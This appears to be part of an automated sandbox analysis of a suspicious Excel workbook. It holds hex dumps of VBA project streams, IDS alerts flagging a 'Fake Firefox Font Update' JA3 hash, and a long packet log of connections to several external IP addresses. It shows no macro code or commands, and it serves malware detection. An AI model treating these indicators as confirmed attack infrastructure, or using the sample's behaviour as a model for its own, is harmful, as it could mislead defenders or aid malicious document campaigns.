                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                CLSID:
                                File Type:data
                                Stream Size:2644
                                Entropy:3.994345845099388
                                Base64 Encoded:False
                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                CLSID:
                                File Type:data
                                Stream Size:553
                                Entropy:6.368451908832245
                                Base64 Encoded:True
                                Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 86 b1 fb 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                Download Network PCAP: filteredfull

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2025-03-26T19:48:43.839468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74969913.107.246.41443TCP
                                2025-03-26T19:48:51.583738+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970113.107.246.41443TCP
                                2025-03-26T19:48:51.593285+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970213.107.246.41443TCP
                                • Total Packets: 203
                                • 443 (HTTPS)
                                • 80 (HTTP)
                                • 53 (DNS)
                                TimestampSource PortDest PortSource IPDest IP
                                Mar 26, 2025 19:48:29.306616068 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.306660891 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:29.307032108 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.307032108 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.307064056 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:29.721252918 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:29.721548080 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.730257988 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.730277061 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:29.730582952 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:29.731168985 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.731168985 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:29.772277117 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:30.160128117 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:30.160185099 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:30.160208941 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:30.160222054 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:30.160250902 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:30.160274982 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:30.185911894 CET49697443192.168.2.7147.79.86.93
                                Mar 26, 2025 19:48:30.185939074 CET44349697147.79.86.93192.168.2.7
                                Mar 26, 2025 19:48:30.194477081 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.293068886 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.293169975 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.293559074 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.395308971 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395324945 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395339012 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395351887 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395391941 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.395394087 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395407915 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395420074 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:30.395441055 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.395459890 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:30.395483017 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:35.409110069 CET8049698172.245.123.32192.168.2.7
                                Mar 26, 2025 19:48:35.409183979 CET4969880192.168.2.7172.245.123.32
                                Mar 26, 2025 19:48:43.549446106 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.549489021 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.549763918 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.550236940 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.550250053 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.839391947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.839468002 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.841424942 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.841439962 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.841726065 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:43.843553066 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:43.884273052 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111735106 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111752987 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111807108 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111861944 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.111890078 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.111958981 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.111958981 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.134248972 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134279013 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134377003 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.134397030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.134462118 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.201958895 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.201986074 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.202088118 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.202101946 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.202321053 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220386028 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220415115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220576048 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220576048 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.220590115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.220834017 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.242105961 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242125988 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242191076 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.242209911 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.242382050 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.297960043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.297983885 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.298062086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.298093081 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.298285961 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.327611923 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.327630997 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.327825069 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.327841997 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.328144073 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.352880955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.352900982 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.352999926 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.353024006 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.353332996 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394684076 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.394704103 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.394783974 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394783974 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.394798040 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.395212889 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.423342943 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423362970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423448086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.423475981 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.423556089 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.452860117 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.452882051 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.453409910 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.453425884 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.453501940 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.489087105 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489105940 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489181042 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.489206076 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.489288092 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517188072 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517208099 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517317057 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517317057 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.517332077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.517442942 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.540374041 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540396929 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540498018 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.540523052 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.540734053 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.575489044 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575508118 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575572968 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.575591087 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.575797081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.576371908 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.603154898 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603173018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603261948 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.603283882 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.603430986 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.625180006 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625209093 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625300884 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.625318050 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.625514030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.652246952 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652282000 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652364016 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.652384043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.652610064 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.682929039 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.682955980 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.683038950 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.683064938 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.684160948 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709306955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709332943 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709414005 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709429026 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709512949 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709512949 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.733814955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.733866930 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.733928919 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.733952045 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.734091043 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.761071920 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761096001 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761172056 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.761195898 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761830091 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.787091970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787117004 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787473917 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.787492037 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787906885 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815304041 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815329075 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815464973 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815465927 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815480947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815654993 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.838557005 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838582039 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838651896 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.838675976 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838872910 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.861789942 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861814976 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861865997 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.861877918 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861927986 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883110046 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883133888 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883164883 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883230925 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883238077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883291960 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.913012981 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913037062 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913084030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.913094044 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913147926 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.934176922 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934201002 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934242010 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.934252977 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934304953 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.956619978 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956645966 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956696987 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.956707954 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956768036 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.981106043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981131077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981209040 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.981219053 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981259108 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.004823923 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.004853964 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.005000114 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.005009890 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.005050898 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026184082 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026211023 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026278019 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026288986 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026320934 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026340008 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.043447018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043454885 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043520927 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.043529987 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043564081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.064011097 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064042091 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064135075 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.064146042 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064184904 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095527887 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095552921 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095624924 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095624924 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095633030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095671892 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.115428925 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115453959 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115497112 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.115504026 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115545988 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135063887 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135086060 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135137081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135143995 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135185003 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135205030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151180983 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151206970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151248932 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151258945 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151292086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151309967 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180490971 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180509090 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180583000 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180593967 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180629015 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180644035 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.199013948 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199040890 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199080944 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.199088097 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199136972 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218717098 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218739033 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218799114 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218820095 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218837976 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218899012 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238194942 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238231897 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238274097 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238287926 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238329887 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238349915 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254138947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254165888 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254220963 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254240990 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254272938 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254293919 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.276855946 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.276885033 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.276978016 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.276997089 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.277043104 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.295351982 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295375109 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295469046 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.295478106 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295527935 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.311609030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311631918 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311693907 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.311709881 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311760902 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.331408978 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331439018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331501007 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.331517935 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331561089 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.352245092 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352276087 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352319002 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.352329969 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352386951 CET49699443192.168.2.713.107.246.41
